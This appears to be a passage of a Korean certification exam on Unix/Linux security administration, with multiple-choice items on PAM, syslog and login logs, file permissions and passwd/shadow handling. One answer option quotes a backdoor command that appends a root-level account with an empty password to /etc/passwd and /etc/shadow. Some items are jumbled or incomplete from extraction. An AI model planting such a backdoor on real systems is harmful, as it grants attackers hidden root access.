62 39. 커널 영역에는 보안과 관련된 몇 개의 블록 디바 이스와 문자 디바이스가 있는데 만약 이 디바이스에 의해 발생되는 숫자를 조합하거나 예측할 수 있을 경 우 보안상 큰 취약성이 존재할 수 있다. 이와 관련된 내용이 아닌 것은? 1 랜덤 데이터를 발생시키는 디바이스는 /dev/random과 /dev/urandom이다. 2 /dev/random과 /dev/urandom은 안전한 난수 발생 기능이 필수적인 PGP 열쇠의 제작, SSH 수하 도전 용 등에 사용된다. 3 "head -c 6 /dev/random mmencode" 명령어를 사용해서 무작위로 안전한 패스워드를 만들 수 있 다. 4 /dev/random과 /dev/urandom은 공격자가 발생된 숫자들의 조합을 미리 알고 있을 경우 그 다음의 나올 숫자를 쉽게 알아낼 수 있다. 40. PAM(Pluggable Authentication Module)은 login, ftp, telnet 등의 일반적인 서버에 대한 인증 부분을 효 율적이고 보다 쉽게 관리하기 위해 고안되었다. PAM 이 할 수 있는 것이 아닌 것은? 1 특정한 사용자가 특정한 시간에 특정한 장소에서만 로그인 할 수 있도록 제한 설정을 할 수 있다. 2 사용자들이 쓸 수 있는 시스템 자원(프로세스 수, 메모리의 양 등)을 제한하여 로컬 서비스 거부공격 (local DoS)을 어느 정도 막을 수 있다. 3 다른 서버들과 안전한 통신을 할 수 있도록 VPN(Virtual private Network)을 지원한다. 4 패스워드 암호화에 DES(Data Encryption Standard) 를 사용하지 않기 때문에 크랙이나 부르트 포스 공격(brute force attack)에 보다 강하다. 41. 각 시스템의 환경설정을 적절히 함으로써 침해사 고의 위험을 예방할 수 있다. 다음 중 OS별 환경설정 파일/디렉터리가 적절히 연결되지 않은 것은? 1 Sun : /etc/inittab 2 HP : /sbin/init.d, /sbin/rcn.d 3 AIX : /etc/rc.*, /etc/inittab 4 Linux : /etc/rc.d/vfstab 42. Solaris 7 시스템에서 다음 초기화 파일 중 Korn, Bourne 쉘에 공통으로 적용되는 파일은? 1 $HOME/.profile 2 $HOME/.kshrc 3 /etc/profile 4 /etc/.login 43. HP-UX에서 일정 시간 미사용 시 자동 로그아웃이 가능하게 설정할 수 있는데, 어떤 파일에 아래와 같은 환경변수 내용을 추가하면 된다. 해당파일 이름은? TMOUT=1800; export TMOUT 1 /etc/passwd 3 /etc/shadow 2 /etc/profile 4 /etc/hosts 44. 다음 파일 목록의 설명이 잘못된 것을 고르면? -r-sr-xr-x root home 2048 Dec 4 10:20 /etc/passwd 1 이 파일은 실행 파일이다. 2 이 파일의 소유자는 읽거나 실행시킬 수 있다. 3 이 파일에는 setgid가 설정되어 있다. 4 이 파일은 수행 중에 일반 사용자가 root 권한을 가질 수 있다. 45. 리눅스 시스템에서 PAM(Pluggable Authentication Module:장착식 인증 모듈)은 사용자를 인증하기 위한 유연한 메커니즘으로 사용된다. 아래 내용은 rlogin 어 플리케이션에 대한 PAM 설정 파일의 내용이다. 현재 4개의 module-type이 있는데, 이에 대한 설명으로 옳 지 않은 것은? [root@linux]# more /etc/pam.d/rlogin auth required auth sufficient /lib/security/pam_securetty.so /lib/security/pam_rhosts_auth.so auth required /lib/security/pam_pwdb.so shadow nullok auth required /lib/security/pam_nologin.so account required /lib/security/pam_pwdb.so password required /lib/security/pam_cracklib.so password required /lib/security/pam_pwdb.so shadow nullok use_authok session required /lib/security/pam_pwdb.so 1 session: refreshing, session, tokens 등 세션 관리 를 처리하는 모듈 2 auth: 실제 인증을 수행하는 모듈로, 사용자에게 패스워드를 입력하거나 기타 자신임을 입증하도록 요구 3 password: 사용자가 요구한 서비스에 접근할 때 사용되는 패스워드를 유지 4 account: 사용자 인증 과정의 계정을 핸들링 하는 모듈로, 사용자 접근 방식이 가이드라인에 맞는지 점검 62
63 46. lastcomm 명령은 사용자 별로 실행한 command 로그를 볼 수 있는 명령이다. 이러한 로그 기록을 보 기 위해선 파일 하나를 생성해야 한다. 파일 이름은 무엇인가? 1 startup 2 wtmp 3 xferlog 4 pacct rung ttyp0 xxx Thu Dec 9 20:47-20:57 (00:10) moof ttyp2 98AE63EE.ipt.aol Thu Dec 9 19:24-19:30 (00:06) moof ttyp2 98AE63EE.ipt.aol Thu Dec 9 19:23-19:24 (00:00) shinsh ftp ppp-ts1-port4.sa Sun Nov 7 00:13-00:15 (00:02) hspark pts/ Sat Nov 6 13:56-14:01 (00:05) moksoon ftp ts7-70t-18.idire Sat Nov 6 13:26-13:30 (00:03) 47. 유닉스 서버에서 시스템 로그 데몬(syslogd)이 남 기는 로그 파일의 위치를 수정하려고 한다. 다음 중 어느 파일에서 설정해 주어야 하는가? 1 who 3 w 2 last 4 lastcomm 1 /etc/inetd.conf 2 /etc/syslog.conf 3 /var/log/messages 4 /var/log/syslog 48. su 명령을 통해서 한 사용자가 다른 사용자로 전 환한 내역을 보려고 할 때, 어떤 로그 파일을 점검해 야 하는가? 1 wtmp 2 utmp 3 lastlog 4 sulog 49. 유닉스 시스템에서 로깅은 syslog를 이용해서 처리 가 되며, syslog 데몬은 다양한 로컬 클라이언트와 원 격 클라이언트의 로그 메시지를 기록 유지하는 점에 서 보안상 상당히 중요하게 관리되어야 한다. syslog에 대한 설명으로 옳지 않은 것은? 1 로그메시지에서 출처 코드는 어떤 하위 시스템으로 부터 메시지가 왔는지를 알려주며, 우선순위 코드 는 메시지가 얼마나 중요한지를 알려준다. 2 출처 코드와 우선순위 코드에 기초한 메시지로 무 엇을 해야 하는지는 /etc/syslog.conf 파일에서 제 어한다. 3 출처 코드와 우선순위 코드에 의해 메시지를 분리 한다면 각각의 로그 파일들은 좀 더 일관성을 가 질 수 있지만 관리해야할 파일이 많아진다. 4 syslog를 이용한 원격 로깅은 TCP통신으로 100% 신뢰할 수 있는 로깅시스템이다. 51. utmp 로그는 현재 로그인한 사용자가 무엇을 하 는지를 볼 수 있는 바이너리 로그이다. 다음과 같이 현재 로그인한 계정의 접근 내역을 보여주는 명령어 는? 9:11pm up 6 days, 5:01, 5 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT chief pts/ Mon10am 7:20m 0.19s 0.04s telnet xxx.xxx hcjung pts/1 hcjung.kisa.or.k 5:59pm 0.00s 0.11s 0.01s w root pts/3 - Thu 3pm 5days 0.02s 0.02s -sh jys pts/ Thu 7pm 5days 0.15s 0.04s sh./vetescan xxx who 2 last 3 w 4 lastcomm 52. pacct 로그는 사용자 로그인에서부터 로그아웃까 지 사용한 명령어를 기록한다. 다음과 같은 접근 내역 을 보여주는 명령어는? lpd F root 0.08 secs Mon Sep 19 15:06 date hacker ttyp secs Mon Sep 19 15:06 sh cenda ttyp secs Mon Sep 19 15:04 calculus D mtdog ttyq secs Mon Sep 19 15:09 more X urd ttypf 0.14 secs Mon Sep 19 15:03 mail S root ttyp secs Mon Sep 19 15:03 1 w 2 last 3 lastcomm 4 pacctcomm 50. wtmp(x) 로그는 계정의 접근 내역, 계정에 대한 정보, 시스템 리부팅을 볼 수 있는 바이너리 로그이다. 다음과 같이 계정의 최종 접근 내역의 내용을 보여주 는 명령어는? 63
64 53. linux 7.0의 로그 파일 중 보안인증 관련 메시지 및 TCP Wrapper의 메시지 등 아래와 같은 로그를 가 지는 로그 파일은? Apr 19 23:23:35 unsecure in.telnetd[645]: connect from Apr 19 23:23:41 unsecure login: LOGIN ON 2 BY hcjung FROM hcjung Apr 20 23:24:29 unsecure in.telnetd[1218]: refused connect from bluebird.a3sc.or.kr Apr 20 23:25:27 unsecure in.telnetd[1219]: connect from access_log 2 system log 3 secure 4 pacct 54. 다음은 ProFTPD을 사용한 파일의 송수신 내역을 보여주는 로그기록이다. 해당 로그 파일은? Sat Apr 21 00:53: sis.or.kr /tmp/statdx2.c a _ i r root ftp 1 root c Sat Apr 21 00:54: sis.or.kr 821 /etc/passwd a _ o r root ftp 1 root c 1 sulog 2 utmp 3 xferlog 4 access_log 56. syslog에서 나타나는 경고 수준을 위험한 순서대로 나열했다. 다음 중 즉시 조치를 요하는 심각한 에러가 발생한 경우는 어떤 수준부터인가? emerg > alert > crit > err > warn > notice > info > debu (중요도순서) 1 emerg 2 alert 3 err 4 warn 57. Solaris 7 시스템에서 Cron 데몬은 관리자의 설정 에 따라 주기적으로 /etc/crontab과 유저가 정의한 crontabs 파일 안의 명령을 실행하는 명령어이다. Cron 데몬이 구동되어 로그가 저장되는 곳은? 1 /var/spool/cron/log 2 /var/cron/log 3 /var/adm/cron 4 /var/adm/messages 58. Solaris 7 시스템의 su(switch User)를 사용하여 접 근한 모든 사용자의 리스트를 볼 수 있는 sulog의 위 치는? 1 /var/adm/wtmp 2 /var/adm/lastlog 3 /var/adm/sulog 4 /var/spool/sulog 55. 시스템 콘솔에 출력되는 메시지를 기록하며, syslog facility에 의해서 설정된 로그 정보도 기록되는 로그 파일 중 아래와 같은 로그를 포함하는 로그파일 은? Dec 4 16:23:54 sample su: 'su root' failed for master on /dev/pts/1 Dec 4 17:14:30 sample rsh[10103]: connection from bad port Dec 4 17:24:39 sample su: 'su root' failed for master on /dev/pts/2 Dec 4 17:24:48 sample last message repeated 1 time Dec 5 11:39:29 sample su: 'su root' failed for master on /dev/pts/1 1 access_log 2 system log 3 messages 4 pacct 59. 리눅스 시스템에서 xferlog는 ftp 데몬을 통하여 송수신되는 모든 파일에 대한 기록을 제공한다. 이와 같은 로그가 존재할 경우 이를 바탕으로 크래커가 시 스템에 들어와서 무슨 작업을 했는지 분석을 할 수 있 다. 또한 파일이 존재할 경우 파일의 내용을 확인하여 백도어나 트로이 목마 프로그램이 수행되었는지 확인 할 수 있다. 아래 내용은 xferlog의 일부분이다. xferlog 형식에 대한 내용으로 맞지 않는 것은? Sun May KISA ========1======2=======3=======4 /home/kisa/.xinitrc b - o kisa ftp 0 * ======5==========6====7=====8= 1 1번은 전송한 시간과 날짜를 나타내며 2 2번은 전송을 위한 총 시간을 나타낸다. 3 3번은 remote hostname을 나타내며, 4 4번은 파일의 총 크기를 나타낸다. 5 5번은 전송된 파일의 이름을 나타내며, 6 6번은 파일압축상태를 뜻한다. 64
65 60. 유닉스 시스템에서 제공하는 프로세스 어카운팅은 공격자의 행위를 알아내기에는 대단히 어려운 점이 많 다. 아래 보기의 내용은 acct/pacct 이외에 공격자가 한 행위를 알아내기 위해서 history 파일의 일부분을 보여주고 있다. 아래 내용에 대한 설명으로 옳지 않은 것은? cd / ls strings core more ls *al core strings core ftp localftp ls *al core telnet xxx.xxx.xxx.xxx pwd exit ls su - uname -a exit id telnet xxx.xxx.xxx.xxx exit ls id pwd uname -a man cue 1 history는 수행 명령을 기록하는 파일로서, csh, bash 등 쉘에 따라.history,.bash_history에 기록된 다. 2 피해시스템 분석 시 불법 사용자 계정이나 root의 history파일을 분석해서, 공격자의 수행 명령을 알 수 있다. 3 acct와 pacct 파일의 차이점은 명령어의 argument 나 디렉터리 위치까지 기록이 가능하다는 것이다. 4 위의 내용을 볼 때 침입자는 Linux의 cue 취약성을 이용해 /에.rhosts 파일을 링크시키려 했다. 62. 리눅스 시스템에서 syslog.conf 파일은 syslogd 기 본 설정 파일로 로깅을 위한 규칙을 정의한다. 이 파 일에서 쓰이는 메시지 종류에는 여러 가지가 있는데 아래 보기 중 메시지 종류에 대한 설명으로 맞지 않은 것은? 1 auth : FTP나 로그인 등 다양한 서비스에서의 사용자 인증 메시지 2 cron : 일정에 맞추어 한번만 작업을 수행할 수 있도록 하는 cron 시스템의 메시지 3 daemon : 추가적 시스템 데몬 메시지 4 kern : 시스템 커널 메시지 63. 최근 크래커에 의해 유닉스 시스템에 접근한 사실 을 확인하고 실행되었던 모든 명령어를 기본적으로 보 여주는 lastcomm이라는 명령어를 사용하여 분석에 들 어갔다. 아래 내용은 lastcomm 명령 실행 시 보여줬던 내용의 일부분이다. 아래 내용에 대한 설명으로 맞지 않은 것은? #lastcomm lpd F root 0.08 secs Mon Sep 19 15:06 date root ttyq secs Mon Sep 19 15:06 sh root 0.05 secs Mon Sep 19 15:04 calculus D kisa1 ttyq secs Mon Sep 19 15:09 more X kisa2 ttypf 0.14 secs Mon Sep 19 15:03 mail S root ttyp secs Mon Sep 19 15:03 =1====2=================3====================== ============4= 1 1은 process를 행한 명령어로써, lpd와 sh에 tty가 없는 것은 root가 실행했기 때문이다. 2 2는 flag이며, lpd는 F로 fork후에 사용된 명령이 고, D flag는 core를 덤프하고 종료된 명령이다. 3 3은 사용자 ID, tty, CPU time을 보여주고 있다. 4 4는 명령을 실행한 시간을 나타내고 있다. 61. System V 계열의 유닉스 시스템에선 접속 실패한 로그에 대해 기록하는 파일을 기본적으로 제공하지 않 는다. 실패한 로그 기록을 위해 만들어야 하는 파일 은? 1 /var/adm/loginlog 2 /var/log/btmp 3 /var/log/secure 4 /var/adm/lastlog 64. AIX 유닉스 시스템에서 서버에 누가 들어왔는지에 대한 로그인 정보를 가지는 로그에 대한 설명 중 옳지 않은 것은? 1 last 명령어는 telnet으로 들어왔는지, ftp로 들어왔 는지, 어떤 IP주소로 들어왔는지에 대한 정보를 알 수 있다. 2 lastcomm 명령어를 실행했을 때 특정 ID에 대한 명령어 로그 기록을 보여준다. 65
66 3 lastcomm 명령어를 실행할 수 있도록 해주기 위해 선 '/usr/sbin/acct/startup'를 실행해 enable을 시켜 주어야 한다. 4 lastcomm명령과 관련된 로그 파일의 위치는 /var/adm/wtmpx이다. 65. 유닉스 시스템에서 사용되는 로그 파일에는 발생 되는 모든 이벤트가 기록되므로 시스템을 관리하거나 점검하는 데 있어 로그 파일의 분석은 필수 조건으로 볼 수 있다. 이러한 로그의 종류도 다양해서 시스템 로그, 네트워크 로그, 기타로 분류될 수 있다. 아래 보 기 중에 성격이 다른 로그로 볼 수 있는 것은? 1 http 2 xferlog 3 samba-log 4 sulog 66. 유닉스 시스템은 사용자의 로그인/로그아웃 정보 뿐만 아니라 모든 사용자에 의해 실행된 모든 단일 명 령어를 기록으로 남기며 이를 프로세스 accounting이 라고 한다. 또한 프로세스 accounting은 /var/adm/acct 또는 /var/adm/pacct 파일에 기록된다. 이에 대한 설 명으로 옳지 않은 것은? 1 acct 및 pacct 파일은 사용자가 직접 읽을 수 있는 text 형태로 사용자가 수행한 단일명령어의 정보를 기록하고 있다. 2 acct 또는 pacct 파일 내용은 직접 보지 않고 lastcomm이나 acctcom 명령어에 의하여 확인이 가능하다. 3 acct/pacct 파일은 사용자별로 사용한 명령어를 구 분하는데 유용하게 사용될 수 있지만, 사용된 명령 어의 argument와 그 명령어가 시스템 내 어느 파 일시스템의 어느 디렉터리에서 실행되었는지는 기 록하지 않는다. 4 acctcom명령어는 System V 계열에서 제공되는 명 령어로 Linux에는 포함되어 있지 않다. 67. 아래의 상황을 부적절하게 설명하고 있는 것은? # vi /etc/passwd root:x:0:1:super-user:/:/usr/local/bin/bash daemon:x:1:1::/: bin:x:2:2::/usr/bin: sys:x:3:3::/: adm:x:4:4:admin:/var/adm: lp:x:71:8:line Printer Admin:/usr/spool/lp: uucp:x:5:5:uucp Admin:/usr/lib/uucp: listen:x:37:4:network Admin:/usr/net/nls: nobody:x:60001:60001:nobody:/: noaccess:x:60002:60002:no Access User:/: nobody4:x:65534:65534:sunos 4.x Nobody:/: informix:x:105:1::/export/informix:/bin/false sis:x:0:1::/home/sis:/bin/sh radioon:x:2101:1::/usr1/radioon:/usr/local/bin/bash imkoma:x:2102:1::/usr1/imkoma:/usr/local/bin/bash # 1 해커가 sis라는 일반 계정을 만들어 백도어로 사용 하고 있는 것으로 판단된다. 2 해커는 /etc/default/login의 #CONSOLE=/dev/console과 같이 설정하여 Remote에서 root 권한으로 로그인할 수 있도록 설정했을 가능성이 크다. 3 shadow 파일을 사용하지 않으므로 일반 계정을 가 지고 있는 사용자라면 크랙 프로그램을 이용하여 쉽게 root 권한을 얻을 가능성이 크다. 4 해커는 /etc/rc3 파일에 echo `sis:x:0:1::/home/sis:/bin/sh` >>/etc/passwd echo `sis::::::::` >>/etc/shadow 백도어를 설정하였을 가능성이 크다. 66
67 68. 갑자기 서버에 과부하가 걸리고 있는 것 같아 시 스템의 프로세스 상황을 살펴보니 아래와 같이 Senmail 프로세스가 많이 떠 있는 것을 확인하였다. 설명으로 옳은 것은? /root]# ps -aux grep sendmail root ? S Aug10 0:10 sendmail: accepti root ? S 01:07 0:00 sendmail: server root ? S 01:32 0:00 sendmail: sevrer root ? S 01:34 0:00 sendmail: server root ? S 01:38 0:00 sendmail: server root ? S Aug11 0:10 sendmail: accepti root ? S 01:07 0:00 sendmail: server root ? S 01:34 0:00 sendmail: server root ? S 01:38 0:00 sendmail: server [root@www /root]# netstat -na grep :25 tcp : :* LISTEN tcp : xxx.xxx.xxx:25 TIME_WAIT tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxx.xxx:25 ESTABLISHED tcp : xxx.xxxx.xxx:25 ESTABLISHED 1 위의 상황으로 보아 외부에서 평상시보다 많은 메 일이 들어오는 것으로 보아 누군가 메일 폭탄을 보내고 있는 것으로 판단된다. 2 평상시보다 많은 메일이 관리하는 서버에서 외부로 나가는 것으로 판단되므로 메일 릴레이 오픈되어 있는지 확인하여야 한다. 3 메일 용량이 모자라 외부에서 들어오는 메일을 처 리 못하는 것으로 판단되므로 메일 용량을 늘릴 필요가 있는 것으로 판단된다 에서 스팸 메일이 들어오는 것으로 판단되 므로 메일서버의 원활한 운영을 위하여 서버에서 차단하는 것이 바람직하다. 70. 다음 파일에 대한 설명이 잘못된 것을 고르면? -rwxr-sr-x 2 root sys 1024 Dec 4 10:20 /bin/sh 1 이 파일은 소유자는 root의 권한으로 실행되는 파일이다. 2 이 파일은 setgid가 걸려있으며 실행파일이다. 3 이 파일은 모든 사용자가 실행 가능하다. 4 이 파일은 모든 사용자가 수정할 수 있다 71. 관리자의 잘못된 파일 권한 설정은 외부 비인가자 의 시스템 공격 대상으로 가장 빈번히 사용되는 취약 성이다. 다음의 사용자 접근 관리 퍼미션 설정 중 잘 못된 것은? 1 사용자별 Home Directory Perm: 700 Owner: each user 2 사용자별 $HOME/.profile Perm: 755 Owner: each user 3 사용자별 $HOME/.login Perm: 700 Owner: each user 4 사용자별 $HOME/.sh_history Perm: 600 Owner: each user 72. 관리자의 잘못된 파일권한 설정은 침해사고 시 공 격 대상으로 가장 빈번히 사용되는 취약성이다. 사용 자 접근 관리 퍼미션 설정 중 잘못된 것은? 1 관리자 권한의 startup file /.cshrc, /.login, /.profile file Perm /etc/utmp perm: 644, Owner: root 3 /etc/tmp perm: 644, Owner: root 4 /etc/syslog.pid perm: 644, Owner: root 69. fsck 명령어는 파일 시스템 무결성 검사 프로그램 이다. 명령어가 체크하지 않는 것은? 73. 루트 파일 시스템 사용률이 100%일 때 점검 사항 으로 타당하지 않은 것은? 1 Inode Format 3 Bad Sector 2 Directory Size 4 Link Count 1 /tmp 파일 안에 대용량의 파일이 존재한다면 이를 지우고 재부팅한다. 2 /dev 장치 파일에 쓰려고 시도하거나 올바르지 않 은 장치 이름을 사용할 때 큰 파일이 생길 수 있 다. 3 쿼터를 부여한 사용자 디렉터리에 큰 파일들이 존 재하는지 살펴본다. 4 /var이 루트 파티션에 있을 때 /var/adm 안의 큰 관리용 파일을 살펴본다. 67
68 74. 유닉스 시스템에서 암호화 파일 시스템이 아닌 것은? 1 CFS 2 NTFS 3 SFS 4 VS3FS 75. 유닉스 시스템에서 사용하는 inode에 대한 설명 중 옳지 않은 것은? 1 유닉스의 파일 시스템 내에 있는 개개의(디렉터리 포함) 파일을 관리하기 위한 데이터 구조를 의미한 다. 2 모든 파일은 하나 혹은 여러 개의 inode를 갖는다. 3 inode는 파일의 형, 접근 보호모드, 식별자, 크기, 파일 실체의 주소, 작성 시간, 최종 접근 시간 등 특정한 파일에 관한 정보를 갖는다. 4 파일의 실체의 주소로서 파일의 선두 부분의 블록 번지를 일부 직접 갖고, 나머지의 블록 번지는 간 접 블록 번지로 가진다. 76. AIX 유닉스 시스템 관리자는 시스템에 설치된 데 이터베이스 작업을 하고 난 후, 눈에 띄게 늘어난 core 파일을 보고 어찌해야 할지를 모르고 있다. core 파일에 대한 설명으로 옳지 않은 것은? 1 core가 / 에 자리 잡고 있다면, find / -name 'core' -exec rm -i {} \;, 혹은 cp /dev/null /core 명령을 사용해 지울 수 있다. 2 core file은 시스템이 core dump를 만났을 때 core file을 만들어 내고 debug 혹은 원인 분석에 사용 될 수 있다. 3 core dump는 시스템이 메모리 주소 충돌, 비정상 적인 명령 수행, 버스 에러 등으로 인하여 발생할 수 있다. 4 core file은 사이즈만 큰 의미 없는 쓰레기 파일이 므로 core file이 생성하면 자동적으로 지우도록 설 정해두어야 한다. 77. 아래 보기는 리눅스 시스템 환경에서 파일 시스템 보안에 대한 설명을 얘기한 것이다. 내용 중 옳지 않 다고 생각되는 것은? 1 /etc/rc.d/rcn.d 파일은 시스템 시작 시 실행되는 서 버프로그램들을 지정하는 곳으로서 사용하지 않는 서 버 프로그램은 부팅 시 실행하지 않도록 해야 한다. 2 보호되어야만 하는 파일을 실수로 지우거나 덮어쓰 기가 되는 경우가 없도록 하기 위해서 immutable bit 를 사용할 수 있다. 3 /etc/exports 파일을 통해 모든 host에 대해 NFS 마운트를 허용해서는 안 된다. 4 시스템 관리 목적으로.rhosts 파일을 만들어 사용 해도 상관없다. 78. 리눅스 시스템에서 적용하는 보안 설정에 관한 설 명 중 옳지 않은 것은? 1 /etc/ftpusers 파일은 ftpd 데몬을 통해서 접속할 수 없는 계정들을 나열하는 파일로, root, bin, sys와 같은 계정으로 ftp 접속을 허용해서는 안 된다. 2 /etc/passwd 파일에서 bin, nobody 등 shell을 사용 하지 않는 특수 계정에 대해서는 로그인 shell을 지정하는 부분에 /bin/false 혹은 /dev/null을 사용 한다. 3 /etc/issue 파일에 시스템 버전 정보가 적혀 있으므 로 접속 사용자들에게 시스템에 대한 정보를 보여 주는 데 좋은 역할을 한다. 4 Tripwire 등의 무결성(integrity) 검사 도구를 사용하 는 것은 해킹에 의한 파일 변조를 탐지해내는 좋 은 방법으로 사용될 수 있다. 79. 아래는 유닉스 계열의 파일 시스템 보안에 대하여 설명한 것이다. 옳지 못한 것은? 1 SUID, SGID, Sticky bit 설정은 파일의 실행과 관련 이 있으므로 해당 파일에 실행 권한이 있을 때만 의미가 있다. 2 SUID가 설정된 파일을 실행하는 경우에는 잠시 동 안 그 파일의 소유자의 권한을 가지게 된다. 3 SUID, SGID, Sticky bit 의 설정 시 대문자 S, T (예:-rwSr--r--)인 경우는 파일에 실행 권한이 없는 상태이다. 4 SUID가 설정된 파일을 실행하면 EUID(Effective UID)와 Real UID가 모두 변한다. 68
69 80. 다음 중 실행 중이던 프로세스의 메모리 이미지를 담고 있는 파일은 무엇인가? 1 dumping file 2 log file 3 transaction file 4 core file 81. /tmp 파일은 여러 사용자가 공유하는 디렉터리이 다. 이러한 디렉터리에서 파일의 소유자만이 해당 파 일을 삭제할 수 있게 설정하는 것은 무엇인가? 1 sticky bit 2 GID bit 3 UID bit 4 umask 82. Solaris 7 시스템에서 마운트란 파일 시스템 구조 내에 있는 일련의 파일들을 사용자나 사용자 그룹들이 이용할 수 있도록 만드는 것이다. 파일 시스템의 마운 트 된 상황을 보는 설정 파일은? 1 /etc/vfstab 2 /etc/mount 3 /etc/mnttab 4 /usr/mount 83. 디스크 구성에 사용되는 명령어가 아닌 것은? 1 mkfs 2 format 3 prtconf 4 fsck 84. 아래 명령어의 올바른 의미를 고르면? (uuencode filetar.z mail -s "filetar.z" user@machine) 86. Solaris 7 시스템에서 마운트(mount)란 파일 시스 템 구조 내에 있는 일련의 파일들을 사용자나 사용자 그룹이 이용할 수 있도록 만드는 것이다. 마운트 된 file system을 보여주는 명령어를 모두 고르면? 1 lsof 2 printconf 3 sysdef 4 mount 87. 유닉스 시스템의 /etc/passwd 파일은 시스템 사용 자의 계정을 등록하기 위한 파일이다. /etc/passwd 파 일 관리에 대한 설명으로 틀린 것은? 1 사용자 아이디는 중복되지 않아야 한다. 2 passwd 파일의 두 번째 필드는 사용자 패스워드란 이므로 비워둔 사용자가 있는지 점검해야 한다. 3 일반 사용자의 UID가 0인지 점검한다. 4 사용자를 삭제하고 싶을 때는 해당 줄의 맨 앞에 # 을 붙인다. 88. 파일 접근 권한 중 setuid나 setgid가 설정되어 있 으면 보안상 위험해 질 수 있다. setuid나 setgid가 설 정되어 있는 파일을 찾는 명령어 중 올바르지 않은 것 은? 1 find / -perm print 2 find / -perm print 3 find / -perm print 4 find / -perm print 1 파일 압축과 계정으로 메일 보내기 2 압축된 파일을 풀어서 계정으로 메일 보내기 3 인코드해서 계정으로 메일 보내기 4 디코드해서 계정으로 메일 보내기 85. Solaris 7 시스템에서 관리자를 위한 유틸리티 실 행 파일이 있는 디렉터리는? 1 /etc 2 /sbin, /usr/sbin 3 /bin 4 /var/sadm 89. 침해사고 시 접근 권한이 없는 비인가자가 기존 파일을 제거하고 자신이 새로 만들어 놓은 파일로 대 체하는 경우 관리자가 점검하기 어렵다. 이렇게 파일 을 생성하기 위하여 사용되는 명령어는? 1 chmod 2 chown 3 pkginfo 4 touch 90. Autofs는 사용자의 요구가 있을 시 자동으로 마운 트해주는 역할을 한다. 현재 마운트 된 파일 시스템을 보는 명령어는? 1 showmount 2 mountd 3 mount 4 prtconf 69
70 91. 부팅 동안 시스템에 대한 정보를 보고 시스템에 로딩되거나 실패한 하드웨어 설정을 보려고 한다. 이 때 스크롤 속도가 너무 빨라서 읽을 수 없다면 부팅 후에 ( )를 실행하면 된다. ( ) 안에 올바른 명령어는? 1 mount 2 dmesg 3 format 4 fsck 92. /etc/fstab은 파일시스템 설정을 위한 파일이다. 파 일 시스템 보안을 위해 fstab에서 설정할 수 있는 내 용 또는 관련된 내용이 아닌 것은? 1 /tmp, /var/tmp 디렉터리는 noexec, nosuid로 설정 한다. 2 버퍼 오버플로를 막기 위해 스택에서 프로그램 실 행을 못하게 설정한다. 3 root 파티션 하나만 두는 것은 하드 디스크 리소스 DOS에 취약하다. 4 각 사용자별 또는 그룹별로 디스크 사용량을 제한 한다. 94. 다음은 사용자 계정 관리에 대한 설명이다. 다음 내용 중 틀린 것을 무엇인가? 1 관리자 계정은 시스템의 모든 권한을 가지므로, 계 정 관리를 철저히 해야 한다. 2 유닉스 시스템의 경우 /tmp 디렉터리는 각 사용자 가 접근하여 작업을 하므로 모든 권한을 열어줘야 한다. 3 각 사용자의 홈디렉터리는 others의 쓰기 권한을 제한해야 한다. 4 각 사용자의 원격 접근은 관리자 계정이 아닌 한 접근제어 설정을 해야 한다. 95. 유닉스 시스템에서 일반 계정의 비밀번호를 저장 할 시 암호화하여 저장한다. 다음 중 어떠한 알고리즘 을 사용하여 비밀번호를 암호화하는가? 1 DES 방식 2 RSA 방식 3 MD5 방식 4 SHA1 방식 93. 리눅스 시스템은 다수의 사용자가 자원을 공유하 기 때문에 사용자의 데이터를 보호해야만 한다. 이를 위해서 디렉터리나 파일마다 권한을 두어 파일 시스템 보안에 신경을 써야만 하는데 이에 대한 해결 방안으 로 적절치 못한 것은? 1 파일을 생성할 때 소유자만이 그 파일에 접근할 수 있도록 umask 값을 700으로 설정하거나 login 시 자동으로 실행하는 파일 안에 이 내용을 추가해준 다. 2 ext2 파일 시스템에서 chattr을 이용해서 파일을 수 정할 수 없도록 설정한다. 3 트로이 목마, 백도어 등 파일의 변조 검사를 위해 주기적으로 파일의 무결성을 점검하고, SUID/SGID 의 설정은 최소한으로 하며 SUID/SGID를 설정할 필요가 없는 파일시스템은 /etc/fstab파일에서 nosuid를 옵션으로 설정한다. 4 umask 명령어는 새로이 생성될 파일에만 적용되고 기존 파일에는 영향을 주지 않는다. 그래서 파일을 생성할 때 소유자만이 그 파일에 접근할 수 있도 록 설정하기 위해선 umask 077 로 설정을 하고 만약 누구든지 96. HP-UX의 시스템 security 설정에 관한 설명이다. Trusted system으로의 전환 과정 중 옳지 않은 것은? 1 새로운 패스워드 파일(/.secure/etc/passwd)을 생성 2 기존의 패스워드 파일을 /etc/passwd.old.sav로 저장 3 /etc/passwd파일에서 암호화된 패스워드들을 /.secure/etc/ passwd로 옮긴다. 4 모든 사용자들에 대한 audit flag 설정이 필요하지 는 않다. 97. 김 씨는 정보시스템부에서 리눅스 레드햇 6.2를 관 리하고 있다. 김 씨가 관리하는 시스템에서 유저 계정 의 패스워드가 암호화되어 저장되는 곳은? 1 /etc/passwd 2 /etc/default/passwd 3 /etc/password 4 /etc/shadow 98. /etc/passwd, /etc/shadow 파일은 사용자 계정에 대한 중요한 정보를 포함하고 있어 접근 통제를 철저 히 해야 한다. 다음 중 위 파일에 대한 접근 통제가 가장 올바르게 설정된 것은? 1 chmod 644 /etc/passwd chmod 600 /etc/shadow 2 chmod 755 /etc/passwd chmod 755 /etc/shadow 3 chmod 655 /etc/passwd chmod 655 /etc/shadow 4 chmod 4755 /etc/passwd chmod 4755 /etc/shadow 70
